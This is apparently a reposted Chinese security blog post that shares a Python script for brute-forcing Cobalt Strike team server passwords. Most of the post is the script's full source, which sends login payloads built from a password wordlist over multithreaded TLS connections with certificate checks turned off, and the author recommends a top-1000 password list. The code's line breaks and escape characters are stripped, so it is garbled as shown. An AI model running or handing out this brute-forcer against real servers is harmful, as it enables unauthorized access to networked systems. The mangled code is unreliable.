爆破cobalt strike密码脚本

admin
admin
admin
102755
文章
87
评论
2022年3月7日02:14:25评论295 views字数 3827阅读12分45秒阅读模式


你 · 的


渗透必备工具


工具清单




无聊的我又来水文了,今天的是爆破cobalt strike密码脚本,最近活脱脱成了一个GITHUB的安(搬)利(运)管(工)。其余时间都是在写作业

和整理自己的知识体系,学的太杂了,别忘了点赞哦!


你也可以来昨天发的那个QQ群一起探讨下“渗透测试中的信息收集方式有哪些,欢迎来做作业”后台回复【QQ群】获取群号。


GITHUB地址;https://github.com/ryanohoro/csbruter


最近的文章总是这么朴实无华,且枯燥,工具的源码如下,字典文件可以用passwdtop1000

#!/usr/bin/env python3
import timeimport socketimport sslimport argparseimport concurrent.futuresimport sys
# csbrute.py - Cobalt Strike Team Server Password Brute Forcer
# https://stackoverflow.com/questions/6224736/how-to-write-python-code-that-is-able-to-properly-require-a-minimal-python-versi
MIN_PYTHON = (3, 3)if sys.version_info < MIN_PYTHON:    sys.exit("Python %s.%s or later is required.n" % MIN_PYTHON)
parser = argparse.ArgumentParser()
parser.add_argument("host",                    help="Teamserver address")parser.add_argument("wordlist", nargs="?",                    help="Newline-delimited word list file")parser.add_argument("-p", dest="port", default=50050, type=int,                    help="Teamserver port")parser.add_argument("-t", dest="threads", default=25, type=int,                    help="Concurrency level")
args = parser.parse_args()
# https://stackoverflow.com/questions/27679890/how-to-handle-ssl-connections-in-raw-python-socket

class NotConnectedException(Exception):    def __init__(self, message=None, node=None):        self.message = message        self.node = node

class DisconnectedException(Exception):    def __init__(self, message=None, node=None):        self.message = message        self.node = node

class Connector:    def __init__(self):        self.sock = None        self.ssl_sock = None        self.ctx = ssl.SSLContext()        self.ctx.verify_mode = ssl.CERT_NONE        pass
    def is_connected(self):        return self.sock and self.ssl_sock
    def open(self, hostname, port):        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)        self.sock.settimeout(10)        self.ssl_sock = self.ctx.wrap_socket(self.sock)
        if hostname == socket.gethostname():            ipaddress = socket.gethostbyname_ex(hostname)[2][0]            self.ssl_sock.connect((ipaddress, port))        else:            self.ssl_sock.connect((hostname, port))
    def close(self):        if self.sock:            self.sock.close()        self.sock = None        self.ssl_sock = None
    def send(self, buffer):        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")        self.ssl_sock.sendall(buffer)
    def receive(self):        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")        received_size = 0        data_buffer = b""
        while received_size < 4:            data_in = self.ssl_sock.recv()            data_buffer = data_buffer + data_in            received_size += len(data_in)
        return data_buffer

def passwordcheck(password):    if len(password) > 0:        result = None        conn = Connector()        conn.open(args.host, args.port)        payload = bytearray(b"x00x00xbexef") + len(password).to_bytes(1, "big", signed=True) + bytes(            bytes(password, "ascii").ljust(256, b"A"))        conn.send(payload)        if conn.is_connected(): result = conn.receive()        if conn.is_connected(): conn.close()        if result == bytearray(b"x00x00xcaxfe"):            return password        else:            return False    else:        print("Ignored blank password")
passwords = []
if args.wordlist:    print("Wordlist: {}".format(args.wordlist))    passwords = open(args.wordlist).read().split("n")else:    print("Wordlist: {}".format("stdin"))    for line in sys.stdin:        passwords.append(line.rstrip())
if len(passwords) > 0:
    print("Word Count: {}".format(len(passwords)))    print("Threads: {}".format(args.threads))
    start = time.time()
    # https://stackoverflow.com/questions/2846653/how-to-use-threading-in-python
    attempts = 0    failures = 0
    with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
        future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}        for future in concurrent.futures.as_completed(future_to_check):            password = future_to_check[future]            try:                data = future.result()                attempts = attempts + 1                if data:                    print("Found Password: {}".format(password))            except Exception as exc:                failures = failures + 1                print('%r generated an exception: %s' % (password, exc))
    print("Attempts: {}".format(attempts))    print("Failures: {}".format(failures))    finish = time.time()    print("Seconds: {:.1f}".format(finish - start))    print("Attemps per second: {:.1f}".format((failures + attempts) / (finish - start)))else:    print("Password(s) required")

本文始发于微信公众号(渗透云笔记):爆破cobalt strike密码脚本

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月7日02:14:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   爆破cobalt strike密码脚本http://cn-sec.com/archives/491398.html

发表评论

匿名网友 填写信息